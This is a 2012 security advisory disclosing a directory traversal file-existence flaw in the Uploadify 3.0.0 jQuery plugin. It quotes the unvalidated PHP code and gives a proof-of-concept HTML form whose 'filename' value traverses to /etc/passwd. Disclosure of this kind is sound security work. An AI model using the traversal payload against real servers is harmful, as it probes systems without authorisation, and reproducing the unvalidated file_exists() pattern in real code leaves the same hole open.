[waraxe-2012-SA#082] - File Existence Disclosure in Uploadify 3.0.0 =============================================================================== Author: Janek Vind "waraxe" Date: 05. April 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-82.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Uploadify is a jQuery plugin that integrates a fully-customizable multiple file upload utility on your website. It uses a mixture of Javascript, ActionScript, and any server-side language to dynamically create an instance over any DOM element on a page. http://www.uploadify.com/ Vulnerable versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected is Uploadify version 3.0.0. ############################################################################### 1. File Existence Disclosure vulnerability in "uploadify-check-exists.php" ############################################################################### Reason: missing input data validation Attack vector: user submitted POST parameter "filename" Preconditions: none Result: attacker can reveal existance of files and directories on remote system Source code snippet from script "uploadify-check-exists.php": -----------------[ source code start ]--------------------------------- if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/uploads/' . $_POST['filename'])) { echo 1; } else { echo 0; } -----------------[ source code end ]----------------------------------- We can see, that user submitted POST parameter "filename" is used in argument for php function "file_exists()". There is no input data validation, therefore attacker can use directory traversal and reveal existence of arbitrary files and directories on affected system. Test: -----------------[ PoC code start ]----------------------------------- <html><body><center> <form action="http://localhost/uploadify-v3.0.0/uploadify-check-exists.php"; method="post"> <input type="hidden" name="filename" value="../../../../../../../../etc/passwd"> <input type="submit" value="Test"> </form> </center></body></html> -----------------[ PoC code start ]----------------------------------- Result: 1 Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@xxxxxxxxx Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------
